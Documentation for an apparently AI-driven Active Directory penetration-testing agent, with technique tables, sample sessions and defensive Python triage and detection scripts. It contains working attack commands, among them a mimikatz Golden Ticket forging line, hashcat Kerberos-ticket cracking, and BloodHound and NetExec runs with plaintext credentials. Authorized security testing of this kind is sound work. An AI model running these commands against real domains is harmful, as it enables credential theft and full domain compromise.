Internal Network Agent
The Internal Network agent is a specialized security testing agent equipped with comprehensive knowledge of Active Directory security, Kerberos protocol attacks, and network penetration testing methodologies.
Overview
The Internal Network agent combines deep Active Directory security knowledge with automated tooling to perform thorough network penetration testing. It’s pre-loaded with specialized skills for AD enumeration, Kerberos attacks, and lateral movement techniques.
Agent Configuration
| Property | Value |
|---|---|
| Agent ID | internal-network |
| Color | Purple |
| Pre-loaded Skills | ad-security, kerberos-attacks, network-pentest, privilege-escalation |
| Allowed Tools | Bash, Read, Glob, Grep, WebFetch, WebSearch, Memory |
Launch the Agent
```
# Start Cyberstrike with the internal network agent
cyberstrike --agent internal-network

# Or switch during a session
/agent internal-network
```

Knowledge Base
The Internal Network agent has access to extensive security knowledge through the skills system.
Active Directory Security Skill
The agent is pre-loaded with comprehensive AD security knowledge including:
- Domain enumeration techniques
- Trust relationship mapping
- Group Policy analysis
- ACL abuse vectors
- Delegation configuration review
- Certificate Services (AD CS) attacks
Kerberos Attacks Skill
Complete Kerberos attack methodology including:
- Kerberoasting (Service ticket extraction)
- AS-REP Roasting (Pre-auth disabled accounts)
- Golden Ticket attacks
- Silver Ticket attacks
- Diamond Ticket attacks
- S4U abuse techniques
- Constrained delegation exploitation
- Resource-based constrained delegation (RBCD)
Network Pentest Skill
Comprehensive network penetration testing knowledge:
- Host discovery and enumeration
- Service identification
- Vulnerability scanning
- Exploitation techniques
- Post-exploitation
- Pivoting and tunneling
Active Directory Attack Vectors
The agent systematically tests AD attack vectors organized by category:
Credential Access (14 techniques)
| Technique ID | Technique Name |
|---|---|
| AD-CRED-01 | LLMNR/NBT-NS Poisoning |
| AD-CRED-02 | Kerberoasting |
| AD-CRED-03 | AS-REP Roasting |
| AD-CRED-04 | Password Spraying |
| AD-CRED-05 | DCSync Attack |
| AD-CRED-06 | NTDS.dit Extraction |
| AD-CRED-07 | LSASS Memory Dumping |
| AD-CRED-08 | SAM Database Extraction |
| AD-CRED-09 | Cached Credentials Extraction |
| AD-CRED-10 | DPAPI Secrets Decryption |
| AD-CRED-11 | Group Policy Preferences |
| AD-CRED-12 | Kerberos Unconstrained Delegation |
| AD-CRED-13 | Shadow Credentials |
| AD-CRED-14 | Machine Account Quota Abuse |
Danger
Credential extraction techniques require explicit authorization. These attacks can trigger security alerts and may violate laws if performed without permission.
Privilege Escalation (12 techniques)
| Technique ID | Technique Name |
|---|---|
| AD-PRIV-01 | ACL Abuse (GenericAll, WriteDACL) |
| AD-PRIV-02 | Group Membership Abuse |
| AD-PRIV-03 | GPO Abuse |
| AD-PRIV-04 | AD CS ESC1-11 Attacks |
| AD-PRIV-05 | Constrained Delegation Abuse |
| AD-PRIV-06 | Resource-Based Constrained Delegation |
| AD-PRIV-07 | SeImpersonate/SeAssignPrimaryToken |
| AD-PRIV-08 | DNSAdmin Abuse |
| AD-PRIV-09 | Exchange Abuse |
| AD-PRIV-10 | SCCM/MECM Abuse |
| AD-PRIV-11 | LAPS Password Retrieval |
| AD-PRIV-12 | gMSA Password Retrieval |
Lateral Movement (10 techniques)
| Technique ID | Technique Name |
|---|---|
| AD-LAT-01 | Pass-the-Hash (PtH) |
| AD-LAT-02 | Pass-the-Ticket (PtT) |
| AD-LAT-03 | Overpass-the-Hash |
| AD-LAT-04 | PSExec/SMBExec |
| AD-LAT-05 | WMI Execution |
| AD-LAT-06 | WinRM/PowerShell Remoting |
| AD-LAT-07 | DCOM Execution |
| AD-LAT-08 | RDP Hijacking |
| AD-LAT-09 | SSH Pivoting |
| AD-LAT-10 | SOCKS Proxy Tunneling |
Persistence (8 techniques)
| Technique ID | Technique Name |
|---|---|
| AD-PERS-01 | Golden Ticket |
| AD-PERS-02 | Silver Ticket |
| AD-PERS-03 | Diamond Ticket |
| AD-PERS-04 | Skeleton Key |
| AD-PERS-05 | AdminSDHolder Modification |
| AD-PERS-06 | SID History Injection |
| AD-PERS-07 | DSRM Account Abuse |
| AD-PERS-08 | DCShadow Attack |
AD CS (Certificate Services) Attack Coverage
The agent includes complete coverage of AD CS attacks (ESC1-ESC11):
| Attack ID | Attack Name | Description |
|---|---|---|
| ESC1 | Misconfigured Certificate Templates | ENROLLEE_SUPPLIES_SUBJECT enabled |
| ESC2 | Misconfigured Certificate Templates | Any Purpose EKU or no EKU |
| ESC3 | Misconfigured Enrollment Agent Templates | Enrollment agent + vulnerable template |
| ESC4 | Vulnerable Certificate Template ACL | Attacker can modify template |
| ESC5 | Vulnerable PKI AD Object ACL | Attacker can modify CA config |
| ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 | CA configured with SAN flag |
| ESC7 | Vulnerable CA ACL | ManageCA or ManageCertificates |
| ESC8 | NTLM Relay to AD CS HTTP Endpoints | Web enrollment without EPA |
| ESC9 | No Security Extension | CT_FLAG_NO_SECURITY_EXTENSION |
| ESC10 | Weak Certificate Mappings | Certificate mapping issues |
| ESC11 | NTLM Relay to ICPR | RPC certificate enrollment |
Tip
Use Certipy or Certify to enumerate AD CS misconfigurations before exploitation.
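Certipy's template checks come down to a handful of attribute tests. The script below is an added example written for this page (it is not Certipy, Certify or Cyberstrike code) that applies the ESC1, ESC2 and ESC3 conditions from the table to constructed template records carrying the AD attributes those tools read. The `enroll` list of principal names is a simplification standing in for the SIDs a real check resolves from the template's nTSecurityDescriptor, and the template names are invented, apart from `UserAuthentication`, which mirrors the ESC1 finding in the session example later on this page. It also shows why the usual remediation works: manager approval (`CT_FLAG_PEND_ALL_REQUESTS`) or a required authorized signature removes a template from all three lists.

```python
"""ESC1/ESC2/ESC3 template triage.

Added example for this page; not Certipy, Certify or Cyberstrike code. Templates are
constructed dicts holding the AD attributes those tools read. 'enroll' is a simplified
list of principal names; a real check resolves SIDs from the template's nTSecurityDescriptor.
"""

# msPKI-Certificate-Name-Flag
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # "CA certificate manager approval"

# Extended Key Usage OIDs
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
OID_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_ANY_PURPOSE = "2.5.29.37.0"
OID_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {OID_CLIENT_AUTH, OID_PKINIT_CLIENT_AUTH, OID_SMARTCARD_LOGON, OID_ANY_PURPOSE}

# Enrollment by any of these means "any domain user/computer can request a certificate"
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def low_priv_can_enroll(tpl):
    return bool(LOW_PRIV_PRINCIPALS & set(tpl["enroll"]))


def requires_approval(tpl):
    """Manager approval or a required authorized signature breaks the ESC1/2/3 chains."""
    pending = bool(tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)
    return pending or tpl["msPKI-RA-Signature"] > 0


def check_template(tpl):
    """Return the ESC labels that apply to one template ([] when it is not abusable as-is)."""
    if not low_priv_can_enroll(tpl) or requires_approval(tpl):
        return []
    issues = []
    ekus = set(tpl["pKIExtendedKeyUsage"])
    supplies_subject = bool(tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    if supplies_subject and ekus & AUTH_EKUS:
        issues.append("ESC1")      # requester picks the SAN and the cert can authenticate
    if not ekus or OID_ANY_PURPOSE in ekus:
        issues.append("ESC2")      # usable for any purpose, including acting as an enrollment agent
    if OID_CERT_REQUEST_AGENT in ekus:
        issues.append("ESC3")      # agent template; a second template accepting agent enrollment completes it
    return issues


def audit(templates):
    return {tpl["name"]: issues for tpl in templates if (issues := check_template(tpl))}


def template(name, ekus, enroll, name_flag=0, enrollment_flag=0, ra_signatures=0):
    return {"name": name, "pKIExtendedKeyUsage": ekus, "enroll": enroll,
            "msPKI-Certificate-Name-Flag": name_flag, "msPKI-Enrollment-Flag": enrollment_flag,
            "msPKI-RA-Signature": ra_signatures}


# Constructed templates; 'UserAuthentication' mirrors the ESC1 finding in this page's session example
SAMPLE_TEMPLATES = [
    template("UserAuthentication", [OID_CLIENT_AUTH], ["Domain Users"],
             name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
    template("UserAuthentication-Fixed", [OID_CLIENT_AUTH], ["Domain Users"],
             name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS),
    template("LegacyAnyPurpose", [OID_ANY_PURPOSE], ["Authenticated Users"]),
    template("EnrollmentAgent", [OID_CERT_REQUEST_AGENT], ["Domain Users"]),
    template("Machine", [OID_CLIENT_AUTH, OID_SERVER_AUTH], ["Domain Computers"]),
    template("AdminAuth", [OID_CLIENT_AUTH], ["Domain Admins"], name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
]

if __name__ == "__main__":
    for name, issues in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: {', '.join(issues)}")
```

Only three of the six constructed templates are reported: the approval-gated copy and the admin-only template drop out before any EKU test runs, which is exactly the behaviour the ESC1 remediation on this page relies on.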
Kerberos Attack Methodology
Kerberoasting
```
> Perform Kerberoasting attack against the domain

[Enumerating SPNs...]
Found 23 service accounts with SPNs

[Requesting service tickets...]
[email protected] - AES256-CTS-HMAC-SHA1-96
[email protected] - RC4-HMAC
[email protected] - AES256-CTS-HMAC-SHA1-96

[Cracking tickets with hashcat...]
hashcat -m 13100 hashes.txt wordlist.txt
# -m 13100 is Kerberos 5 TGS-REP etype 23 (RC4); AES256 tickets need -m 19700, AES128 -m 19600

FINDING: Kerberoastable Service Account
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-CRED-02
Account: svc_sql@corp.local
SPN: MSSQLSvc/sql01.corp.local:1433
Encryption: RC4-HMAC (weak)
Severity: High (CVSS 7.5)
Evidence: Password cracked in 2 minutes
CWE: CWE-521
```
```
Remediation:
- Use AES256 encryption for service accounts
- Use long, complex passwords (25+ chars)
- Consider Group Managed Service Accounts (gMSA)
```

AS-REP Roasting
```
> Find and exploit accounts with pre-auth disabled

[Querying LDAP for DONT_REQUIRE_PREAUTH...]
Found 5 accounts with pre-authentication disabled

[Requesting AS-REP tickets...]
[email protected] - Ticket obtained
[email protected] - Ticket obtained

FINDING: AS-REP Roastable Account
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-CRED-03
Account: [email protected]
User Account Control: DONT_REQUIRE_PREAUTH
Severity: High (CVSS 7.5)
Evidence: AS-REP hash extractable without auth
CWE: CWE-287
```
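Both findings above are decided by the same handful of LDAP attributes, and the hashcat mode depends on which encryption type the KDC hands back. The script below is an added example for this page (not Cyberstrike or Impacket code): it classifies constructed account records for Kerberoasting and AS-REP roasting exposure, skips accounts that cannot usefully be roasted (disabled accounts, machine accounts with random passwords, krbtgt), and maps the expected ticket encryption type to a hashcat mode. Account names and attribute values are constructed; the bit values are the documented `userAccountControl` and `msDS-SupportedEncryptionTypes` flags.

```python
"""Kerberoasting (AD-CRED-02) and AS-REP roasting (AD-CRED-03) triage from LDAP attributes.

Added example for this page; not Cyberstrike or Impacket code. Accounts are constructed dicts
carrying the attributes a real run pulls over LDAP: sAMAccountName, userAccountControl,
servicePrincipalName and msDS-SupportedEncryptionTypes.
"""

# userAccountControl bits
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits
ENC_RC4_HMAC, ENC_AES128, ENC_AES256 = 0x04, 0x08, 0x10

# Kerberos etype numbers as they appear in the TGS-REP / AS-REP, and the hashcat modes for each
ETYPE_RC4, ETYPE_AES128, ETYPE_AES256 = 23, 17, 18
HASHCAT_TGS_REP = {ETYPE_RC4: 13100, ETYPE_AES128: 19600, ETYPE_AES256: 19700}
HASHCAT_AS_REP = {ETYPE_RC4: 18200}   # AES AS-REP modes exist in newer hashcat but are not mapped here


def supported_enc(value):
    """Absent/zero msDS-SupportedEncryptionTypes has historically meant 'RC4 only' for user accounts."""
    if not value:
        return {ENC_RC4_HMAC}
    return {bit for bit in (ENC_RC4_HMAC, ENC_AES128, ENC_AES256) if value & bit}


def expected_etype(enc):
    """RC4 is negotiable whenever the account still supports it (the requester advertises only RC4);
    otherwise expect the strongest AES the account supports."""
    if ENC_RC4_HMAC in enc:
        return ETYPE_RC4
    return ETYPE_AES256 if ENC_AES256 in enc else ETYPE_AES128


def triage(account):
    name, uac = account["sAMAccountName"], account["userAccountControl"]
    if uac & UF_ACCOUNTDISABLE:
        return []                                   # disabled accounts get neither ticket type
    enc = supported_enc(account.get("msDS-SupportedEncryptionTypes"))
    etype = expected_etype(enc)
    findings = []
    has_spn = bool(account.get("servicePrincipalName"))
    is_machine = name.endswith("$")                 # random 120-char passwords: not worth roasting
    if has_spn and not is_machine and name.lower() != "krbtgt":
        findings.append({
            "technique": "AD-CRED-02", "etype": etype, "hashcat": HASHCAT_TGS_REP[etype],
            # RC4 cracks at full speed; AES tickets go through PBKDF2 (4096 rounds) and are far slower
            "severity": "High" if etype == ETYPE_RC4 else "Low",
        })
    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append({"technique": "AD-CRED-03", "etype": etype,
                         "hashcat": HASHCAT_AS_REP.get(etype), "severity": "High"})
    return findings


def roastable(accounts):
    """Map account name -> findings, dropping accounts with nothing to report."""
    return {a["sAMAccountName"]: f for a in accounts if (f := triage(a))}


SAMPLE_ACCOUNTS = [   # constructed for this example
    {"sAMAccountName": "svc_sql", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"], "msDS-SupportedEncryptionTypes": 0},
    {"sAMAccountName": "svc_iis", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD,
     "servicePrincipalName": ["HTTP/web01.corp.local"], "msDS-SupportedEncryptionTypes": ENC_AES128 | ENC_AES256},
    {"sAMAccountName": "SQL01$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local"], "msDS-SupportedEncryptionTypes": 0x1C},
    {"sAMAccountName": "krbtgt", "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "legacy_app", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "old_user",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
]

if __name__ == "__main__":
    for name, findings in roastable(SAMPLE_ACCOUNTS).items():
        for f in findings:
            print(f"{name}: {f['technique']} etype {f['etype']} -> hashcat -m {f['hashcat']} ({f['severity']})")
```

The AES-only service account is still reported, but at Low severity: the ticket is crackable offline, just at a small fraction of RC4 speed, so the password length is the control that matters there.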
```
Remediation:
- Enable Kerberos pre-authentication
- Audit accounts with this flag disabled
```

Golden Ticket Attack
```
> Demonstrate Golden Ticket persistence

[Prerequisites...]
✓ Domain SID: S-1-5-21-3623811015-3361044348-30300820
✓ krbtgt NTLM hash: aad3b435b51404eeaad3b435b51404ee:8846f7...

[Forging Golden Ticket...]
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-3623811015-3361044348-30300820 /krbtgt:8846f7... /ptt

FINDING: Golden Ticket Attack Possible
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-PERS-01
Impact: Complete domain compromise
Persistence: 10 years (mimikatz default lifetime for forged tickets; KDC-issued TGTs default to 10 hours)
Severity: Critical (CVSS 10.0)
Evidence: Forged TGT accepted by KDC
CWE: CWE-287
```
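"Monitor for TGT anomalies" has a concrete starting point: a forged ticket carries whatever lifetime, renewal window and encryption type the attacker chose, while a KDC-issued one is bounded by the domain's Kerberos policy. The check below is an added example for this page (not Cyberstrike code). The ticket records are constructed, the policy values are the Default Domain Policy defaults (MaxTicketAge 10 hours, MaxRenewAge 7 days), and the "AES-only domain" switch is an assumption about the environment; in practice the same fields come from `klist` on a host or from 4768/4769 events (Ticket Encryption Type).

```python
"""TGT sanity check against domain Kerberos policy: the first-line detection for forged tickets.

Added example for this page, not Cyberstrike code. Ticket records are constructed; real input
would be klist output or 4768/4769 telemetry plus the domain's Kerberos policy settings.
"""
from datetime import datetime, timedelta

# Default Domain Policy Kerberos settings
DEFAULT_POLICY = {"max_ticket_age": timedelta(hours=10), "max_renew_age": timedelta(days=7)}

# Encryption types as logged in the 4768/4769 'Ticket Encryption Type' field
ETYPE_RC4_HMAC = 0x17
ETYPE_AES256 = 0x12


def forged_ticket_indicators(ticket, policy=DEFAULT_POLICY, aes_only_domain=True):
    """Return the reasons a TGT looks forged (an empty list means it is consistent with policy)."""
    reasons = []
    lifetime = ticket["end"] - ticket["start"]
    if lifetime > policy["max_ticket_age"]:
        reasons.append(f"lifetime {lifetime} exceeds MaxTicketAge {policy['max_ticket_age']}")
    renewable = ticket["renew_till"] - ticket["start"]
    if renewable > policy["max_renew_age"]:
        reasons.append(f"renewable for {renewable}, MaxRenewAge is {policy['max_renew_age']}")
    # mimikatz kerberos::golden forges RC4-encrypted tickets unless /aes256 is supplied
    if aes_only_domain and ticket["etype"] == ETYPE_RC4_HMAC:
        reasons.append("RC4-HMAC TGT in a domain whose accounts are AES-only")
    return reasons


def ticket(client, start, end, renew_till, etype):
    return {"client": client, "start": start, "end": end, "renew_till": renew_till, "etype": etype}


# Constructed tickets: one issued normally by the KDC, one with mimikatz defaults (10-year lifetime, RC4)
ISSUED = ticket("jsmith@CORP.LOCAL", datetime(2024, 6, 3, 8), datetime(2024, 6, 3, 18),
                datetime(2024, 6, 10, 8), ETYPE_AES256)
GOLDEN = ticket("Administrator@CORP.LOCAL", datetime(2024, 6, 3, 8), datetime(2034, 6, 1, 8),
                datetime(2034, 6, 1, 8), ETYPE_RC4_HMAC)

if __name__ == "__main__":
    for t in (ISSUED, GOLDEN):
        reasons = forged_ticket_indicators(t)
        print(t["client"], "->", "; ".join(reasons) or "consistent with policy")
```

The policy comparison is the robust part; the RC4 indicator only holds once the domain's accounts have actually been moved to AES, which is also why the remediation list pairs krbtgt rotation with monitoring rather than relying on either alone.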
```
Remediation:
- Reset the krbtgt password twice (waiting for replication between resets; the KDC honours the previous key until the second reset)
- Implement Credential Guard
- Monitor for TGT anomalies
```

Testing Methodology
The agent follows a structured approach:
```
┌─────────────────────────────────────────────────────────────┐
│                     TESTING METHODOLOGY                     │
├─────────────────────────────────────────────────────────────┤
│  1. RECONNAISSANCE                                          │
│     └── Network scanning, domain enumeration                │
│                                                             │
│  2. ENUMERATION                                             │
│     └── Users, groups, ACLs, trusts, policies               │
│                                                             │
│  3. VULNERABILITY IDENTIFICATION                            │
│     └── Misconfigurations, weak permissions, CVEs           │
│                                                             │
│  4. EXPLOITATION                                            │
│     └── Credential access, privilege escalation             │
│                                                             │
│  5. LATERAL MOVEMENT                                        │
│     └── Pivoting, persistence, domain dominance             │
│                                                             │
│  6. REPORTING                                               │
│     └── Attack paths, findings, remediation                 │
└─────────────────────────────────────────────────────────────┘
```

Integrated Security Tools
The agent leverages industry-standard penetration testing tools:
| Tool | Purpose |
|---|---|
| BloodHound | Attack path visualization and analysis |
| NetExec (nxc) | Network service enumeration and exploitation |
| Impacket | Python AD attack toolkit |
| Certipy | AD CS enumeration and exploitation |
| Rubeus | Kerberos attack toolkit |
| Mimikatz | Credential extraction and manipulation |
| Responder | LLMNR/NBT-NS poisoning |
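BloodHound's "shortest path to Domain Admin" is a breadth-first search over the edges that grant control of the next node. The script below is an added example for this page, not BloodHound code: its edge list is constructed to reproduce the three-hop ACL-abuse path reported in the session example later on this page, plus a longer alternative route and one edge (`GetChanges` without `GetChangesAll`) that must not be traversed because it is not DCSync on its own. The `ABUSABLE` set is a hand-picked subset of the edge kinds BloodHound treats as traversable; a real run would read the edges from the BloodHound database or the SharpHound / bloodhound-python JSON export.

```python
"""Shortest abusable path to Domain Admins over a BloodHound-style edge list.

Added example for this page, not BloodHound code. Edges are constructed; ABUSABLE is a subset
of the edge kinds BloodHound marks as traversable for privilege escalation.
"""
from collections import deque

ABUSABLE = {"MemberOf", "GenericAll", "GenericWrite", "WriteDACL", "WriteOwner", "Owns",
            "AddMember", "ForceChangePassword", "AdminTo", "HasSession", "AllowedToDelegate", "DCSync"}

SAMPLE_EDGES = [  # (source, edge kind, target); constructed for this example
    ("jsmith@corp.local", "MemberOf", "Help Desk@corp.local"),
    ("Help Desk@corp.local", "GenericAll", "IT-Admins@corp.local"),
    ("IT-Admins@corp.local", "WriteDACL", "Domain Admins@corp.local"),
    # a longer alternative through a server session, which the search must rank second
    ("jsmith@corp.local", "MemberOf", "IT-Support@corp.local"),
    ("IT-Support@corp.local", "AdminTo", "SQL01.corp.local"),
    ("SQL01.corp.local", "HasSession", "svc_backup@corp.local"),
    ("svc_backup@corp.local", "MemberOf", "Domain Admins@corp.local"),
    # GetChanges without GetChangesAll is not DCSync, so it is not an abusable edge
    ("jsmith@corp.local", "GetChanges", "corp.local"),
]


def shortest_path(edges, start, target, abusable=ABUSABLE):
    """Breadth-first search over abusable edges; returns [(src, kind, dst), ...] or None."""
    graph = {}
    for src, kind, dst in edges:
        if kind in abusable:
            graph.setdefault(src, []).append((kind, dst))
    parent = {start: None}          # node -> (previous node, edge kind used to reach it)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for kind, nxt in graph.get(node, ()):
            if nxt not in parent:
                parent[nxt] = (node, kind)
                queue.append(nxt)
    if target not in parent:
        return None
    path, node = [], target
    while parent[node] is not None:
        src, kind = parent[node]
        path.append((src, kind, node))
        node = src
    return path[::-1]


def render(path):
    """'A → MemberOf → B → GenericAll → C', the layout used in the findings on this page."""
    if not path:
        return ""
    out = [path[0][0]]
    for _, kind, dst in path:
        out += [kind, dst]
    return " → ".join(out)


if __name__ == "__main__":
    path = shortest_path(SAMPLE_EDGES, "jsmith@corp.local", "Domain Admins@corp.local")
    print(f"Shortest path to Domain Admins: {len(path)} hops")
    print("Path:", render(path))
```

Removing `WriteDACL` from the abusable set (as a hardening check would) makes the search fall back to the four-hop session route, which is how to verify that fixing one ACL actually closes the path rather than just lengthening it.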
Tool Integration Example
```
> Run BloodHound collection against the domain

[Executing BloodHound collector...]
bloodhound-python -c All -d corp.local -u jsmith -p 'Password123' -ns 10.0.0.1

[Collection complete]
Users: 2,847
Computers: 156
Groups: 423
GPOs: 89
OUs: 34
Domains: 1
Trusts: 2

[Analyzing attack paths...]
Shortest path to Domain Admin: 3 hops

Path: [email protected] → MemberOf → IT-Support → GenericAll → [email protected] → AdminTo → DC01.corp.local
```

NetExec (CrackMapExec Successor) Example
```
> Enumerate SMB shares across the network

[Executing NetExec...]
nxc smb 10.0.0.0/24 -u jsmith -p 'Password123' --shares

[Results]
10.0.0.10  445  DC01  [*] Windows Server 2019 (name:DC01) (domain:corp.local)
10.0.0.10  445  DC01  [+] corp.local\jsmith:Password123
10.0.0.10  445  DC01  SYSVOL     READ
10.0.0.10  445  DC01  NETLOGON   READ
10.0.0.10  445  DC01  IT-Share   READ,WRITE
10.0.0.10  445  DC01  HR-Data    NO ACCESS

FINDING: Sensitive Share Access
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Host: DC01 (10.0.0.10)
Share: IT-Share
Access: READ,WRITE
User: jsmith (non-privileged)
Severity: Medium (CVSS 5.3)
Evidence: Standard user has write access to IT share
CWE: CWE-732

Remediation:
- Review share permissions
- Implement least privilege
- Enable share auditing
```

CVSS Severity Rating
The agent rates findings using CVSS 3.1:
| Severity | CVSS Score | Example Findings |
|---|---|---|
| Critical | 9.0 - 10.0 | DCSync possible, Golden Ticket, AD CS ESC1 |
| High | 7.0 - 8.9 | Kerberoasting (weak), GenericAll on DA |
| Medium | 4.0 - 6.9 | Password spraying, SMB share access |
| Low | 0.1 - 3.9 | Information disclosure, null sessions |
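Tying the NetExec share listing to these bands: the script below is an added example for this page (not NetExec or Cyberstrike code) that parses constructed `nxc smb --shares` output into share records and rates each one as seen by a non-privileged user. The Medium rating for a writable custom share matches the IT-Share finding earlier on this page; the Critical rating for writable SYSVOL or NETLOGON is this example's own judgement (GPO and logon-script tampering reach every domain member), and the Low rating for readable custom shares is a prompt to inspect contents, not a verdict. The sample output is constructed in nxc's column layout, and the parser also accepts the rendering used on this page, which drops the leading protocol column.

```python
"""Parse NetExec --shares output and rate share exposure with this page's severity bands.

Added example for this page, not NetExec or Cyberstrike code. SAMPLE_OUTPUT is constructed in
nxc's layout (protocol, IP, port, hostname, share, permissions, remark).
"""

SAMPLE_OUTPUT = """\
SMB  10.0.0.10  445  DC01  [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB  10.0.0.10  445  DC01  [+] corp.local\\jsmith:Password123
SMB  10.0.0.10  445  DC01  [*] Enumerated shares
SMB  10.0.0.10  445  DC01  Share      Permissions  Remark
SMB  10.0.0.10  445  DC01  -----      -----------  ------
SMB  10.0.0.10  445  DC01  ADMIN$                  Remote Admin
SMB  10.0.0.10  445  DC01  C$                      Default share
SMB  10.0.0.10  445  DC01  IPC$       READ         Remote IPC
SMB  10.0.0.10  445  DC01  NETLOGON   READ         Logon server share
SMB  10.0.0.10  445  DC01  SYSVOL     READ         Logon server share
SMB  10.0.0.10  445  DC01  IT-Share   READ,WRITE
SMB  10.0.0.10  445  DC01  HR-Data
SMB  10.0.0.21  445  FS01  [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB  10.0.0.21  445  FS01  [+] corp.local\\jsmith:Password123
SMB  10.0.0.21  445  FS01  Finance    READ         Finance department
SMB  10.0.0.21  445  FS01  Public     READ,WRITE   Drop folder
SMB  10.0.0.11  445  DC02  SYSVOL     READ,WRITE   Logon server share
"""

DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$", "PRINT$"}
POLICY_SHARES = {"SYSVOL", "NETLOGON"}      # GPO and logon-script content replicated to every DC


def parse_shares(output):
    """One dict per share line; status lines ([*], [+]), the column header and the rule are skipped."""
    shares = []
    for line in output.splitlines():
        parts = line.split()
        if parts and parts[0] == "SMB":
            parts = parts[1:]                     # the protocol column is optional in this parser
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        ip, _port, host, name = parts[:4]
        if name.startswith(("[", "-")) or name == "Share":
            continue
        rest = parts[4:]
        perms = set()
        if rest and rest[0] in ("READ", "WRITE", "READ,WRITE"):
            perms = set(rest.pop(0).split(","))   # anything left is the free-text remark
        shares.append({"ip": ip, "host": host, "share": name, "perms": perms, "remark": " ".join(rest)})
    return shares


def rate(share):
    """Severity band for one share as seen by a non-privileged user (None = nothing to report)."""
    name, perms = share["share"].upper(), share["perms"]
    if "WRITE" in perms and name in POLICY_SHARES:
        return "Critical"     # this example's judgement: writable GPO/logon scripts run on every member
    if "WRITE" in perms and name not in DEFAULT_SHARES:
        return "Medium"       # the 'standard user has write access' finding on this page
    if "READ" in perms and name not in (DEFAULT_SHARES | POLICY_SHARES):
        return "Low"          # readable custom share: inspect contents before raising it
    return None


def share_findings(output, user):
    findings = []
    for share in parse_shares(output):
        severity = rate(share)
        if severity:
            findings.append({"host": f"{share['host']} ({share['ip']})", "share": share["share"],
                             "access": ",".join(sorted(share["perms"])), "user": user, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in share_findings(SAMPLE_OUTPUT, "jsmith"):
        print(f"{f['severity']:8} {f['host']:20} {f['share']:10} {f['access']}")
```

Shares with no permission column (the `HR-Data` and `NO ACCESS` cases) parse to an empty permission set and are dropped, so the report only lists what the test account could actually touch.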
Session Example
```
You: Perform Active Directory security assessment against corp.local

Agent: I'll perform a comprehensive AD security assessment following structured methodology.

## Phase 1: Domain Enumeration

[Connecting to domain controller...]
Domain: corp.local
Domain Controller: DC01.corp.local (10.0.0.10)
Forest Functional Level: Windows Server 2016

[Enumerating domain objects...]
Users: 2,847
Computers: 156
Groups: 423
Trust Relationships: 2 (bidirectional to partner.local)

## Phase 2: Credential Access Testing

[Testing AD-CRED-02: Kerberoasting...]
⚠ FINDING - 8 accounts with crackable service tickets

FINDING: Kerberoastable Service Accounts
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-CRED-02
Affected Accounts:
  - svc_sql (RC4, Password: Summer2023!)
  - svc_backup (RC4, cracking in progress)
  - svc_iis (AES256, strong password)
Severity: High (CVSS 7.5)
CWE: CWE-521

## Phase 3: Privilege Escalation Analysis

[Testing AD-PRIV-01: ACL Abuse...]
⚠ FINDING - Attack path to Domain Admin identified

FINDING: ACL Abuse Path to Domain Admin
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-PRIV-01
Start: jsmith@corp.local
Path:
  1. jsmith → MemberOf → Help Desk
  2. Help Desk → GenericAll → IT-Admins group
  3. IT-Admins → WriteDACL → Domain Admins
Severity: Critical (CVSS 9.8)
Evidence: BloodHound path verified
CWE: CWE-269

[Testing AD-PRIV-04: AD CS Attacks...]
⚠ FINDING - ESC1 vulnerable template found

FINDING: AD CS ESC1 - Vulnerable Certificate Template
